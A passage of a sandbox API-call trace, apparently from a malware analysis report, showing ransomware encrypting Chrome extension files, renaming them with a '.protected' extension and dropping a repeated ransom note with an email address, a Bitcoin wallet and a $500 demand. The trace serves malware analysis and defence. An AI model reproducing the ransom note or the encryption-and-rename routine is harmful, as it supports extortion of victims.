dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.134] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.135] lstrlenA (lpString="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") returned 684 [0081.135] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.135] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.135] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.135] CloseHandle (hObject=0x164) returned 1 [0081.135] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0081.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl") returned 145 [0081.135] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0081.135] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0081.135] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*") returned 147 [0081.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.136] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.136] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.136] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.136] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.136] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\.") returned 147 [0081.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.136] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.136] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.136] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.136] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.136] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\..") returned 148 [0081.136] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.136] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.136] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.136] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.136] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.137] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.137] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.137] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.137] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29a, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.147] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29a, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.147] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.147] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.147] CloseHandle (hObject=0x168) returned 1 [0081.147] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.protected") returned 169 [0081.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.protected")) returned 1 [0081.148] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.148] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.148] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\RESTORE_FILES.txt") returned 163 [0081.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.149] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.149] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.150] lstrlenA (lpString="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") returned 684 [0081.150] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.150] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.150] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.150] CloseHandle (hObject=0x164) returned 1 [0081.150] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0081.150] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR") returned 148 [0081.150] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0081.150] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0081.150] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*") returned 150 [0081.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.151] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\.") returned 150 [0081.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.151] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.151] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.151] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.151] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.151] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.151] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.151] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\..") returned 151 [0081.151] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.151] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.151] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.151] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.151] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.151] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.151] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.151] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.153] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.153] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.153] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.153] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.154] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.154] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.154] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.154] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.154] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.155] CloseHandle (hObject=0x168) returned 1 [0081.155] wnsprintfW (in: pszDest=0xd11128, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.protected") returned 172 [0081.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0081.155] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.155] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.156] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 166 [0081.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.156] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.156] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.157] lstrlenA 
